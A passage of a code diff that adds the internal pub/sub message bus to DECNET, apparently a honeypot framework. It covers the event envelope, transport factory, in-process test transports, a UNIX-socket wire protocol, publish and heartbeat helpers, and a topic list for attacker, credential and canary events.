    subsequent calls within ``_RETRY_BACKOFF`` seconds return ``None``
    without re-attempting — after the backoff window, the next call
    retries.  This is what lets the API recover from a
    ``decnet bus``-started-after-API race without a full API restart.
    """
    global _shared, _last_failure_ts
    if _shared is not None:
        return _shared
    if (time.monotonic() - _last_failure_ts) < _RETRY_BACKOFF:
        return None
    async with _lock:
        if _shared is not None:
            return _shared
        if (time.monotonic() - _last_failure_ts) < _RETRY_BACKOFF:
            return None
        try:
            candidate = get_bus(client_name="api")
            await candidate.connect()
            _shared = candidate
            _last_failure_ts = 0.0
            return _shared
        except Exception as exc:  # noqa: BLE001
            log.warning("app bus unavailable: %s", exc)
            _last_failure_ts = time.monotonic()
            return None
 async def close_app_bus() -> None:
    """Close the shared bus if one is open; clear the backoff window.
    Call from the API lifespan shutdown.  Safe to call multiple times.
    Resetting ``_last_failure_ts`` means the next ``get_app_bus()``
    after shutdown-and-restart-within-the-same-process (rare, but
    tests do this) retries immediately instead of honouring a stale
    backoff.
    """
    global _shared, _last_failure_ts
    bus, _shared = _shared, None
    _last_failure_ts = 0.0
    if bus is not None:
        try:
            await bus.close()
        except Exception as exc:  # noqa: BLE001
            log.warning("app bus close raised: %s", exc)
--- a/decnet/bus/base.py
+++ b/decnet/bus/base.py
@@ -0,0 +1,206 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Bus abstractions: the :class:`Event` envelope and the :class:`BaseBus` ABC.
 Every transport (NATS, in-process fake, null) speaks this contract.  The
 envelope is versioned (``v``) so future evolution never breaks deployed
 consumers that happen to see a newer event shape.
 Subscription model: :meth:`BaseBus.subscribe` returns a :class:`Subscription`
 that is an async context manager AND an async iterator.  The expected usage is:
    async with bus.subscribe("topology.*.mutation.*") as sub:
        async for event in sub:
            handle(event)
 Leaving the ``async with`` releases the underlying subscription handle; the
 transport is free to drop any buffered events after that point.
 """
 from __future__ import annotations
 import abc
 import asyncio
 import time
 import uuid
 from dataclasses import dataclass, field
 from typing import Any, AsyncIterator
 EVENT_SCHEMA_VERSION = 1
@dataclass(frozen=True)
 class Event:
    """The bus envelope.
    ``v`` is the envelope schema version, bumped on incompatible shape
    changes.  ``type`` is a short discriminator (``"mutation.applied"``,
    ``"decky.state"``) useful for consumers that subscribe to a broad
    wildcard and dispatch in Python; it is redundant with the trailing
    segments of ``topic`` but cheaper to inspect.  ``ts`` is epoch seconds
    (float).  ``id`` is a random UUID so consumers can de-dupe if they
    ever see the same event twice (not expected at-most-once, but cheap
    insurance).
    """
    topic: str
    payload: dict[str, Any]
    type: str = ""
    v: int = EVENT_SCHEMA_VERSION
    ts: float = field(default_factory=time.time)
    id: str = field(default_factory=lambda: uuid.uuid4().hex)
    def to_dict(self) -> dict[str, Any]:
        return {
            "v": self.v,
            "id": self.id,
            "topic": self.topic,
            "type": self.type,
            "ts": self.ts,
            "payload": self.payload,
        }
    @classmethod
    def from_dict(cls, topic: str, data: dict[str, Any]) -> "Event":
        """Reconstruct an Event from a wire-format dict.
        ``topic`` is passed explicitly because the transport knows which
        subject the message arrived on; trusting a ``topic`` field from the
        wire would let a misbehaving publisher spoof events on topics they
        don't actually publish to.
        """
        return cls(
            topic=topic,
            payload=data.get("payload", {}) or {},
            type=data.get("type", "") or "",
            v=int(data.get("v", EVENT_SCHEMA_VERSION)),
            ts=float(data.get("ts", time.time())),
            id=data.get("id") or uuid.uuid4().hex,
        )
 class Subscription(abc.ABC):
    """An open subscription — async context manager + async iterator.
    Concrete transports subclass this and implement :meth:`_aclose` plus the
    async iterator protocol.  Callers should not instantiate directly; use
    :meth:`BaseBus.subscribe`.
    """
    def __init__(self, pattern: str) -> None:
        self.pattern = pattern
        self._closed = False
    async def __aenter__(self) -> "Subscription":
        return self
    async def __aexit__(self, *exc: Any) -> None:
        await self.aclose()
    def __aiter__(self) -> AsyncIterator[Event]:
        return self
    async def aclose(self) -> None:
        if self._closed:
            return
        self._closed = True
        await self._aclose()
    @abc.abstractmethod
    async def __anext__(self) -> Event:  # pragma: no cover - abstract
        raise NotImplementedError
    @abc.abstractmethod
    async def _aclose(self) -> None:  # pragma: no cover - abstract
        raise NotImplementedError
 class BaseBus(abc.ABC):
    """Pub/sub transport contract.
    Implementations MUST be safe to ``await connect()`` multiple times and
    ``await close()`` multiple times.  Publishing to a closed bus raises
    :class:`RuntimeError`; subscribing to a closed bus does too.
    """
    @abc.abstractmethod
    async def connect(self) -> None:
        """Establish any network/transport resources.  Idempotent."""
    @abc.abstractmethod
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        """Publish *payload* on *topic*.  Fire-and-forget.
        Delivery is at-most-once.  On transport error the implementation
        logs and returns; it does not raise, because bus losses must not
        cascade into worker failure (DB is source of truth).
        """
    @abc.abstractmethod
    def subscribe(self, pattern: str) -> Subscription:
        """Return a :class:`Subscription` that yields events matching *pattern*.
        Patterns follow NATS wildcard semantics: ``*`` matches one topic
        token, ``>`` matches one-or-more trailing tokens.  Examples:
        * ``topology.*.mutation.applied`` — all ``applied`` events for any
          topology.
        * ``topology.abc123.mutation.*`` — all mutation states for one
          topology.
        * ``topology.>`` — every event under the ``topology`` root.
        """
    @abc.abstractmethod
    async def close(self) -> None:
        """Tear down transport resources.  Idempotent."""
    async def __aenter__(self) -> "BaseBus":
        await self.connect()
        return self
    async def __aexit__(self, *exc: Any) -> None:
        await self.close()
 # ─── Wildcard matching shared across in-process transports ───────────────────
 def matches(pattern: str, topic: str) -> bool:
    """Return True iff *topic* matches *pattern* under NATS wildcard rules.
    ``*`` matches exactly one non-empty token; ``>`` matches one-or-more
    trailing tokens (so ``topology.>`` matches ``topology.abc.x`` but not
    ``topology`` alone).
    """
    p_tokens = pattern.split(".")
    t_tokens = topic.split(".")
    for i, p in enumerate(p_tokens):
        if p == ">":
            # Must have at least one token remaining to match.
            return i < len(t_tokens)
        if i >= len(t_tokens):
            return False
        if p == "*":
            if not t_tokens[i]:
                return False
            continue
        if p != t_tokens[i]:
            return False
    return len(p_tokens) == len(t_tokens)
 # Sentinel used by the in-process transports to signal "no more events"
 # through the asyncio.Queue fan-out without inventing a separate control
 # channel.  Not part of the wire protocol.
 _CLOSE_SENTINEL: Any = object()
 async def _next_or_stop(queue: "asyncio.Queue[Any]") -> Event:
    """Pop the next item from *queue*, raising ``StopAsyncIteration`` on close."""
    item = await queue.get()
    if item is _CLOSE_SENTINEL:
        raise StopAsyncIteration
    return item
--- a/decnet/bus/factory.py
+++ b/decnet/bus/factory.py
@@ -0,0 +1,86 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Bus factory — selects a :class:`~decnet.bus.base.BaseBus` implementation.
 Dispatch key: the ``DECNET_BUS_TYPE`` environment variable.
 * ``unix`` (default) → :class:`~decnet.bus.unix_client.UnixSocketBus`
 * ``fake``           → :class:`~decnet.bus.fake.FakeBus` (in-process)
 If ``DECNET_BUS_ENABLED`` is ``"false"`` the factory short-circuits to
 :class:`~decnet.bus.fake.NullBus` regardless of ``DECNET_BUS_TYPE`` — a
 cheap way for dev environments to run workers without a bus daemon.
 Mirrors :mod:`decnet.web.db.factory` (lazy imports inside each branch,
 env-driven dispatch, optional telemetry wrapping).  Callers MUST use
 :func:`get_bus` rather than instantiating transports directly.
 """
 from __future__ import annotations
 import os
 from typing import Any
 from decnet.bus.base import BaseBus
 def get_bus(**kwargs: Any) -> BaseBus:
    """Instantiate the bus implementation selected by environment.
    Keyword arguments are forwarded to the concrete transport:
    * ``UnixSocketBus`` accepts ``socket_path`` (overrides
      ``DECNET_BUS_SOCKET``) and ``client_name``.
    * ``FakeBus`` accepts ``queue_size``.
    """
    if os.environ.get("DECNET_BUS_ENABLED", "true").lower() == "false":
        from decnet.bus.fake import NullBus
        return NullBus()
    bus_type = os.environ.get("DECNET_BUS_TYPE", "unix").lower()
    if bus_type == "unix":
        from decnet.bus.unix_client import UnixSocketBus
        socket_path = kwargs.pop("socket_path", None) or _default_socket_path()
        bus: BaseBus = UnixSocketBus(socket_path=socket_path, **kwargs)
    elif bus_type == "fake":
        from decnet.bus.fake import FakeBus
        bus = FakeBus(**kwargs)
    else:
        raise ValueError(f"Unsupported bus type: {bus_type}")
    return _maybe_wrap_telemetry(bus)
 def _default_socket_path() -> str:
    """Return the bus socket path honoring ``DECNET_BUS_SOCKET`` and falling
    back to ``/run/decnet/bus.sock`` → ``~/.decnet/bus.sock``.
    The runtime path (``/run/decnet``) is preferred because systemd
    ``RuntimeDirectory=decnet`` sets it up with the right perms; the home
    fallback keeps dev boxes usable without systemd.
    """
    explicit = os.environ.get("DECNET_BUS_SOCKET")
    if explicit:
        return explicit
    runtime_dir = "/run/decnet"
    if os.path.isdir(runtime_dir) and os.access(runtime_dir, os.W_OK):
        return f"{runtime_dir}/bus.sock"
    return os.path.expanduser("~/.decnet/bus.sock")
 def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
    """Wrap *bus* in a tracing proxy if OTEL is enabled, else return as-is.
    Uses :func:`decnet.telemetry.wrap_repository` as the underlying proxy —
    its implementation is generic (wraps any async method in a span), so we
    reuse it with a bus-appropriate tracer name.  If telemetry isn't wired
    up at all we no-op.
    """
    try:
        from decnet.telemetry import wrap_repository
    except ImportError:
        return bus
    try:
        return wrap_repository(bus)
    except Exception:  # pragma: no cover - defensive
        return bus
--- a/decnet/bus/fake.py
+++ b/decnet/bus/fake.py
@@ -0,0 +1,184 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """In-process bus transports.
 * :class:`FakeBus` — real pub/sub semantics without touching a socket.  Used
  by unit tests and anywhere ``DECNET_BUS_TYPE=fake`` is set.  Lets code
  that depends on the bus be exercised entirely inside a single event loop,
  matching the DECNET testing convention of not opening real network
  sockets from unit tests.
 * :class:`NullBus` — no-op.  Returned by :func:`~decnet.bus.factory.get_bus`
  when ``DECNET_BUS_ENABLED=false`` so workers can start cleanly in dev
  environments where no bus daemon is running.  Publishes are dropped;
  subscriptions yield nothing and close cleanly.
 """
 from __future__ import annotations
 import asyncio
 from typing import Any
 from decnet.bus.base import (
    BaseBus,
    Event,
    Subscription,
    _CLOSE_SENTINEL,
    matches,
 )
 from decnet.logging import get_logger
 log = get_logger("bus.fake")
 # Per-subscriber bounded queue: backpressure policy is drop-oldest so a slow
 # consumer cannot stall publishers (the invariant — DB is the source of
 # truth — makes dropped events acceptable).
 _DEFAULT_QUEUE_SIZE = 1024
 # ─── FakeBus ─────────────────────────────────────────────────────────────────
 class _FakeSubscription(Subscription):
    """Subscription backed by an :class:`asyncio.Queue` fed from
    :meth:`FakeBus.publish`.  Unregisters itself on close."""
    def __init__(self, bus: "FakeBus", pattern: str, queue: "asyncio.Queue[Any]") -> None:
        super().__init__(pattern)
        self._bus = bus
        self._queue = queue
    async def __anext__(self) -> Event:
        if self._closed:
            raise StopAsyncIteration
        item = await self._queue.get()
        if item is _CLOSE_SENTINEL:
            raise StopAsyncIteration
        return item
    async def _aclose(self) -> None:
        self._bus._unregister(self)
        # Unblock any pending __anext__ waiter.
        try:
            self._queue.put_nowait(_CLOSE_SENTINEL)
        except asyncio.QueueFull:
            pass
 class FakeBus(BaseBus):
    """In-process pub/sub.
    Publishes iterate every active subscription and enqueue the event on
    the ones whose pattern matches the topic.  If a subscriber's queue is
    full, the oldest event is discarded to make room — same at-most-once
    semantics as the real UNIX-socket transport.
    """
    def __init__(self, queue_size: int = _DEFAULT_QUEUE_SIZE) -> None:
        self._queue_size = queue_size
        self._subs: list[_FakeSubscription] = []
        self._connected = False
        self._closed = False
        self._lock = asyncio.Lock()
    async def connect(self) -> None:
        self._connected = True
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        if self._closed:
            raise RuntimeError("publish on closed bus")
        event = Event(topic=topic, payload=payload, type=event_type)
        async with self._lock:
            targets = [s for s in self._subs if matches(s.pattern, topic)]
        for sub in targets:
            _enqueue_drop_oldest(sub._queue, event)
    def subscribe(self, pattern: str) -> Subscription:
        if self._closed:
            raise RuntimeError("subscribe on closed bus")
        queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=self._queue_size)
        sub = _FakeSubscription(self, pattern, queue)
        self._subs.append(sub)
        return sub
    def _unregister(self, sub: _FakeSubscription) -> None:
        try:
            self._subs.remove(sub)
        except ValueError:
            pass
    async def close(self) -> None:
        if self._closed:
            return
        self._closed = True
        # Wake every still-open subscription so iterators unblock cleanly.
        for sub in list(self._subs):
            try:
                sub._queue.put_nowait(_CLOSE_SENTINEL)
            except asyncio.QueueFull:
                pass
        self._subs.clear()
 def _enqueue_drop_oldest(queue: "asyncio.Queue[Any]", event: Event) -> None:
    """Put *event* on *queue*, dropping the oldest item if the queue is full.
    Factored out so both FakeBus and the real UNIX server share the exact
    same backpressure policy.
    """
    while True:
        try:
            queue.put_nowait(event)
            return
        except asyncio.QueueFull:
            try:
                dropped = queue.get_nowait()
                log.warning(
                    "bus.fake: subscriber queue full, dropped %s", getattr(dropped, "topic", "?")
                )
            except asyncio.QueueEmpty:
                return
 # ─── NullBus ─────────────────────────────────────────────────────────────────
 class _NullSubscription(Subscription):
    """A subscription that never yields and closes immediately on iteration."""
    async def __anext__(self) -> Event:
        raise StopAsyncIteration
    async def _aclose(self) -> None:
        return
 class NullBus(BaseBus):
    """No-op bus used when ``DECNET_BUS_ENABLED=false``.
    Publishes are silently dropped; subscriptions are empty.  Intended for
    dev environments where no bus daemon is running — the process starts
    cleanly, code that publishes doesn't need feature flags, and nothing
    ever blocks on a subscriber.
    """
    async def connect(self) -> None:
        return
    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        return
    def subscribe(self, pattern: str) -> Subscription:
        return _NullSubscription(pattern)
    async def close(self) -> None:
        return
--- a/decnet/bus/protocol.py
+++ b/decnet/bus/protocol.py
@@ -0,0 +1,145 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Wire protocol for the DECNET bus UNIX-socket transport.
 Frame layout:
    <VERB> [<args ...>]\\n          # ASCII header, single line, no trailing space
    <4-byte big-endian body length>
    <body>                          # orjson-serialized dict, or empty (length 0)
 Verbs:
 * ``HELLO <client-name>`` — optional greeting, logged by server.  Body empty.
 * ``PUB <topic>``          — publisher → server.  Body = payload dict.
 * ``SUB <pattern>``        — subscriber → server.  Body empty.
 * ``UNSUB <pattern>``      — subscriber → server.  Body empty.
 * ``EVT <topic>``          — server → subscriber.  Body = payload dict (wrapped
                             in an :class:`~decnet.bus.base.Event` envelope).
 * ``BYE``                  — either direction.  Body empty.  Graceful shutdown.
 Parsing rules:
 * The header is a single line terminated by ``\\n`` (LF).  ``\\r`` is tolerated
  but not required.
 * Header tokens are whitespace-separated.  The first token is the verb;
  everything after is verb-specific.  We split on the first space only so
  topics / patterns with quoted content are not supported (they are not
  needed — topic segments forbid whitespace per :mod:`decnet.bus.topics`).
 * Maximum header length is 4096 bytes; maximum body length is 1 MiB.  Beyond
  those, the connection is dropped with a logged error.  This is a honeypot
  framework, not a general-purpose message broker; a malformed frame is
  treated as hostile.
 """
 from __future__ import annotations
 import asyncio
 import struct
 from dataclasses import dataclass
 from typing import Any
 import orjson
 MAX_HEADER_BYTES = 4096
 MAX_BODY_BYTES = 1 * 1024 * 1024  # 1 MiB
 # Verb constants (callers should reference these, not bare strings).
 HELLO = "HELLO"
 PUB = "PUB"
 SUB = "SUB"
 UNSUB = "UNSUB"
 EVT = "EVT"
 BYE = "BYE"
 _VALID_VERBS = frozenset({HELLO, PUB, SUB, UNSUB, EVT, BYE})
 class ProtocolError(Exception):
    """Malformed or oversized frame.  Callers should close the connection."""
@dataclass(frozen=True)
 class Frame:
    """A parsed frame.  ``body`` is the raw (unparsed) body bytes — callers
    decide whether to orjson-decode it (the protocol does not know whether
    a given verb expects a dict body or an empty one).
    """
    verb: str
    args: str            # everything after the verb on the header line, trimmed
    body: bytes
 def encode(verb: str, args: str = "", body: dict[str, Any] | None = None) -> bytes:
    """Serialize a frame.
    *body* is a dict that will be orjson-encoded, or ``None`` for an empty
    body.  The header line is written verbatim — callers must supply args
    that are free of ``\\n``.
    """
    if verb not in _VALID_VERBS:
        raise ProtocolError(f"unknown verb {verb!r}")
    if "\n" in args or "\r" in args:
        raise ProtocolError("args must not contain newline characters")
    body_bytes = b"" if body is None else orjson.dumps(body)
    if len(body_bytes) > MAX_BODY_BYTES:
        raise ProtocolError(
            f"body {len(body_bytes)} bytes exceeds max {MAX_BODY_BYTES}"
        )
    header = f"{verb} {args}".rstrip() + "\n"
    header_bytes = header.encode("ascii")
    if len(header_bytes) > MAX_HEADER_BYTES:
        raise ProtocolError(
            f"header {len(header_bytes)} bytes exceeds max {MAX_HEADER_BYTES}"
        )
    return header_bytes + struct.pack(">I", len(body_bytes)) + body_bytes
 async def read_frame(reader: asyncio.StreamReader) -> Frame | None:
    """Read one frame from *reader*.
    Returns ``None`` on clean EOF before a new frame starts.  Raises
    :class:`ProtocolError` on malformed input (caller should close the
    connection).
    """
    try:
        header = await reader.readuntil(b"\n")
    except asyncio.IncompleteReadError as exc:
        if not exc.partial:
            return None
        raise ProtocolError("connection closed mid-header") from exc
    except asyncio.LimitOverrunError as exc:
        raise ProtocolError("header exceeded buffer limit") from exc
    if len(header) > MAX_HEADER_BYTES:
        raise ProtocolError(f"header {len(header)} bytes exceeds max")
    line = header.rstrip(b"\r\n").decode("ascii", errors="strict")
    if not line:
        raise ProtocolError("empty header line")
    verb, _, args = line.partition(" ")
    if verb not in _VALID_VERBS:
        raise ProtocolError(f"unknown verb {verb!r}")
    length_bytes = await reader.readexactly(4)
    (body_len,) = struct.unpack(">I", length_bytes)
    if body_len > MAX_BODY_BYTES:
        raise ProtocolError(f"body length {body_len} exceeds max")
    body = await reader.readexactly(body_len) if body_len else b""
    return Frame(verb=verb, args=args.strip(), body=body)
 def decode_body(body: bytes) -> dict[str, Any]:
    """Decode a frame body as a JSON dict.  Empty body → empty dict."""
    if not body:
        return {}
    try:
        obj = orjson.loads(body)
    except orjson.JSONDecodeError as exc:
        raise ProtocolError(f"body is not valid JSON: {exc}") from exc
    if not isinstance(obj, dict):
        raise ProtocolError(f"body must be a JSON object, got {type(obj).__name__}")
    return obj
--- a/decnet/bus/publish.py
+++ b/decnet/bus/publish.py
@@ -0,0 +1,212 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fire-and-forget publish helpers shared across every worker.
 Lifted out of ``decnet/mutator/engine.py`` once a second caller showed up
 (DEBT-031).  Keeping one implementation means the "never break the worker
 loop" guarantee is audited in exactly one place.
 """
 from __future__ import annotations
 import asyncio
 import contextlib
 import os
 import signal
 import time
 from typing import Any, Callable
 from decnet.bus import topics as _topics
 from decnet.bus.base import BaseBus
 from decnet.logging import get_logger
 log = get_logger("bus.publish")
 async def publish_safely(
    bus: BaseBus | None,
    topic: str,
    payload: dict[str, Any],
    event_type: str = "",
 ) -> None:
    """Publish on *bus* without ever raising back at the caller.
    The DB row (or equivalent side-effect) has already been committed by
    the time a worker calls this; the bus is the notification layer, not
    the source of truth.  A dropped publish is at most a few seconds of
    UI latency until the next poll tick.  A raised exception here, by
    contrast, would crash the worker — which is strictly worse.
    """
    if bus is None:
        return
    try:
        await bus.publish(topic, payload, event_type=event_type)
    except Exception as exc:  # noqa: BLE001
        log.warning("bus publish failed topic=%s: %s", topic, exc)
 def make_thread_safe_publisher(
    bus: BaseBus | None,
    loop: asyncio.AbstractEventLoop,
 ) -> Callable[[str, dict[str, Any], str], None]:
    """Build a sync callable that marshals publishes back to *loop*.
    Workers that run their hot paths in a worker thread (scapy sniff loop,
    ``asyncio.to_thread`` probes, blocking socket reads) cannot ``await``
    the bus directly.  This helper returns a plain function that schedules
    the publish on *loop* via ``run_coroutine_threadsafe`` and returns
    immediately — the calling thread is never blocked on the publish.
    A ``None`` bus yields a no-op callable, matching the degraded-mode
    contract the rest of this module already upholds.
    """
    if bus is None:
        return lambda _topic, _payload, _event_type="": None  # type: ignore[misc]
    def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
        # Stream threads may keep draining after the bus owner closed it
        # (shutdown race).  Short-circuit here so we don't marshal a
        # coroutine onto a dead loop just to have publish_safely swallow
        # it.  bus.publish's own WARN-once guard handles the rare case
        # where _closed flips between this check and the coroutine
        # actually running.
        if getattr(bus, "_closed", False):
            return
        try:
            asyncio.run_coroutine_threadsafe(
                publish_safely(bus, topic, payload, event_type=event_type),
                loop,
            )
        except Exception as exc:  # noqa: BLE001
            log.debug("cross-thread bus publish failed topic=%s: %s", topic, exc)
    return _publish
 async def run_health_heartbeat(
    bus: BaseBus | None,
    worker: str,
    *,
    interval: float = 30.0,
    extra: Callable[[], dict[str, Any]] | None = None,
 ) -> None:
    """Publish ``system.<worker>.health`` every *interval* seconds.
    Standard heartbeat loop shared across agent/forwarder/updater.  Emits
    ``{"worker": <name>, "ts": <unix-ts>, **extra()}`` on each tick.  A
    ``None`` bus turns the loop into a no-op sleep cycle — still cancellable
    so the caller can use the same ``asyncio.create_task``/``.cancel()``
    pattern regardless of bus state.
    Cancellation-safe: unwraps the ``CancelledError`` so callers awaiting
    the task during shutdown see a clean exit.
    """
    topic = _topics.system_health(worker)
    with contextlib.suppress(asyncio.CancelledError):
        while True:
            payload: dict[str, Any] = {"worker": worker, "ts": time.time()}
            if extra is not None:
                try:
                    payload.update(extra())
                except Exception as exc:  # noqa: BLE001
                    log.debug("heartbeat extra() failed worker=%s: %s", worker, exc)
            await publish_safely(bus, topic, payload, event_type=_topics.SYSTEM_HEALTH)
            await asyncio.sleep(interval)
 async def run_control_listener(
    bus: BaseBus | None,
    worker: str,
    shutdown: asyncio.Event,
 ) -> None:
    """Subscribe to ``system.<worker>.control`` and honour stop intents.
    On a well-formed ``{"action": "stop", ...}`` message the function sets
    *shutdown* and returns — the worker's main loop is expected to check
    the event and unwind cleanly, matching the SIGTERM path.
    Malformed payloads (missing/unknown action, non-dict, exception from
    the transport) are logged and ignored.  A ``None`` bus yields a noop
    coroutine that simply awaits *shutdown* — callers can ``create_task``
    this unconditionally regardless of bus state.
    Cancellation-safe.
    """
    if bus is None:
        with contextlib.suppress(asyncio.CancelledError):
            await shutdown.wait()
        return
    topic = _topics.system_control(worker)
    with contextlib.suppress(asyncio.CancelledError):
        try:
            async with bus.subscribe(topic) as sub:
                async for event in sub:
                    payload = event.payload or {}
                    action = payload.get("action")
                    requested_by = payload.get("requested_by", "<unknown>")
                    if action == _topics.WORKER_CONTROL_STOP:
                        log.info(
                            "control: stop requested worker=%s by=%s",
                            worker, requested_by,
                        )
                        shutdown.set()
                        return
                    log.debug(
                        "control: ignoring unknown action worker=%s action=%r",
                        worker, action,
                    )
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "control listener failed worker=%s: %s — shutdown via bus disabled",
                worker, exc,
            )
 async def run_control_listener_signal(
    bus: BaseBus | None,
    worker: str,
 ) -> None:
    """Like :func:`run_control_listener` but signals the process on stop.
    Preferred for workers whose main loop is a blocking thread
    (container-log tail, PTY read, scapy sniff) — wiring an
    ``asyncio.Event`` through the thread boundary is error-prone, and
    every DECNET worker already has systemd-equivalent SIGTERM cleanup.
    A SIGTERM self-signal routes the stop through that same path
    without inventing a second shutdown mechanism.
    Cancellation-safe.  Never raises: a failed self-signal is logged
    and the loop simply exits (admin can fall back to ``systemctl``).
    """
    if bus is None:
        return
    topic = _topics.system_control(worker)
    with contextlib.suppress(asyncio.CancelledError):
        try:
            async with bus.subscribe(topic) as sub:
                async for event in sub:
                    payload = event.payload or {}
                    action = payload.get("action")
                    requested_by = payload.get("requested_by", "<unknown>")
                    if action == _topics.WORKER_CONTROL_STOP:
                        log.info(
                            "control: stop requested worker=%s by=%s → SIGTERM self",
                            worker, requested_by,
                        )
                        try:
                            os.kill(os.getpid(), signal.SIGTERM)
                        except Exception as exc:  # noqa: BLE001
                            log.warning(
                                "control: self-signal failed worker=%s: %s",
                                worker, exc,
                            )
                        return
                    log.debug(
                        "control: ignoring unknown action worker=%s action=%r",
                        worker, action,
                    )
        except Exception as exc:  # noqa: BLE001
            log.warning(
                "control signal listener failed worker=%s: %s",
                worker, exc,
            )
--- a/decnet/bus/topics.py
+++ b/decnet/bus/topics.py
@@ -0,0 +1,653 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Canonical topic hierarchy for the DECNET ServiceBus.
 Locked early so consumers can subscribe with stable wildcard patterns.
 Adding new topic families is fine; **renaming** existing ones is a breaking
 change for every subscriber and requires a coordinated rollout.
 Token structure (NATS-style, dot-separated):
    topology.{topology_id}.mutation.{state}
    topology.{topology_id}.status
    decky.{decky_id}.state
    decky.{decky_id}.traffic
    orchestrator.traffic.{decky_id}
    orchestrator.file.{decky_id}
    orchestrator.email.{decky_id}
    attacker.observed
    attacker.scored
    attacker.session.started
    attacker.session.ended
    attacker.observation.{primitive}
    identity.formed
    identity.observation.linked
    identity.merged
    identity.unmerged
    identity.campaign.assigned
    campaign.formed
    campaign.identity.assigned
    campaign.merged
    campaign.unmerged
    credential.captured
    credential.reuse.detected
    attribution.profile.state_changed
    attribution.profile.multi_actor_suspected
    canary.{token_id}.triggered
    canary.{token_id}.placed
    canary.{token_id}.revoked
    system.log
    system.bus.health
    system.{worker}.health
    email.received
    ttp.tagged
    ttp.rule.fired.{technique_id}
    ttp.rule.suppressed
 Wildcards (per :func:`decnet.bus.base.matches`):
 * ``*`` matches exactly one token.
 * ``>`` matches one-or-more trailing tokens (so ``topology.>`` matches
  ``topology.abc.status`` but not the bare root ``topology``).
 """
 from __future__ import annotations
 # ─── Root prefixes ───────────────────────────────────────────────────────────
 TOPOLOGY = "topology"
 DECKY = "decky"
 ATTACKER = "attacker"
 IDENTITY = "identity"
 CAMPAIGN = "campaign"
 SYSTEM = "system"
 CREDENTIAL = "credential"
 ATTRIBUTION = "attribution"
 ORCHESTRATOR = "orchestrator"
 CANARY = "canary"
 SMTP = "smtp"
 EMAIL = "email"
 TTP = "ttp"
 # ─── Leaf event-type constants (the last segment of each topic) ──────────────
 # Topology mutation lifecycle states — keep in sync with TopologyMutation.state
 # in decnet/web/db/models.py; the bus topic mirrors the DB state machine.
 MUTATION_ENQUEUED = "enqueued"
 MUTATION_APPLYING = "applying"
 MUTATION_APPLIED = "applied"
 MUTATION_FAILED = "failed"
 # Topology-level status transitions (topology.{id}.status): fires when the
 # topology row's status column changes (pending/deploying/active/degraded/failed).
 TOPOLOGY_STATUS = "status"
 # Decky-level event types (second token).
 DECKY_STATE = "state"
 DECKY_TRAFFIC = "traffic"
 # On-demand mutation request — published by the API/CLI/UI, consumed by
 # the mutator's watch loop to force an immediate mutation of one decky
 # without waiting for its scheduled interval.  Underscored (not dotted)
 # to stay a single NATS token so the builder's validator accepts it.
 DECKY_MUTATE_REQUEST = "mutate_request"
 # Mutation transition event — distinct from DECKY_STATE ("current
 # shape") because a mutation is a *transition* that carries old/new
 # services + trigger + timing.  Correlator consumes these (via the
 # syslog sidechannel too) to interleave substrate-change markers into
 # attacker traversals.
 DECKY_MUTATION = "mutation"
 # Per-service add/remove on a deployed decky (live; no full redeploy).
 # Payload carries ``decky_name``, ``service_name``, optional
 # ``topology_id``, and ``services`` (the post-mutation list).  Consumers
 # that watch substrate shape (correlator, dashboard, profiler) reconcile
 # off these without waiting for the next decnet-state.json snapshot.
 DECKY_SERVICE_ADDED = "service_added"
 DECKY_SERVICE_REMOVED = "service_removed"
 # Per-service config change (the schema-driven Inspector form).  Payload
 # carries ``decky_name``, ``service_name``, optional ``topology_id``,
 # ``service_config`` (the new validated dict), and ``recreated`` — true
 # when the operator hit Apply (container was force-recreated to pick up
 # the new env), false when they only hit Save (DB-only).
 DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
 # Async deploy/mutate operation transitions
 # (pending/running/succeeded/failed).  Payload: {lifecycle_id, operation,
 # status, error?}.  UI polling endpoint is the source of truth; this
 # fires for live subscribers (dashboard, mutator-side audit, etc).
 DECKY_LIFECYCLE = "lifecycle"
 # Attacker event types (second token under the ``attacker`` root).  First
 # sighting, session boundary transitions, and score-threshold crossings
 # published by correlator + profiler.  Consumers typically subscribe to
 # the wildcard ``attacker.>``.
 ATTACKER_OBSERVED = "observed"
 ATTACKER_SCORED = "scored"
 # Published once per successful active probe result (JARM/HASSH/TCPfp/ipv6_leak).
 # Distinct from ``observed`` which is the correlator's first-sight signal —
 # a fingerprint is additional evidence about an already-observed attacker.
 # Known payload ``kind`` discriminators carried in this topic:
 #   "jarm"         — JARM TLS server hash (prober)
 #   "hassh"        — HASSHServer SSH key-exchange hash (prober)
 #   "tcpfp"        — TCP/IP stack fingerprint hash (prober)
 #   "tls_cert"     — leaf TLS certificate SHA-256 (prober)
 #   "ipv6_leak"    — fe80:: link-local address observed via passive sniffer
 #                    or active ICMPv6 solicitation (prober + sniffer);
 #                    payload: {attacker_ip, addr, iid_kind, mac_oui, vector,
 #                              on_iface, observed_at}
 ATTACKER_FINGERPRINTED = "fingerprinted"
 # Published when the prober observes a NEW hash for an
 # (attacker_ip, port, probe_type) triple it has seen before — i.e. the
 # attacker rotated their VPS, rebuilt their SSH server, swapped their
 # TLS cert.  Distinct from ``fingerprinted`` which fires on every probe
 # result; ``fingerprint_rotated`` fires only on diff and carries both
 # old_hash + new_hash.  Producer: prober (via the rotation library);
 # consumers: dashboard, forensics, attribution clustering.
 ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
 ATTACKER_SESSION_STARTED = "session.started"
 ATTACKER_SESSION_ENDED = "session.ended"
 # Published by the ``decnet enrich`` worker after an enrichment pass
 # succeeds for an attacker IP (one or more 3rd-party intel providers
 # returned a verdict).  Payload carries the aggregate verdict + per-
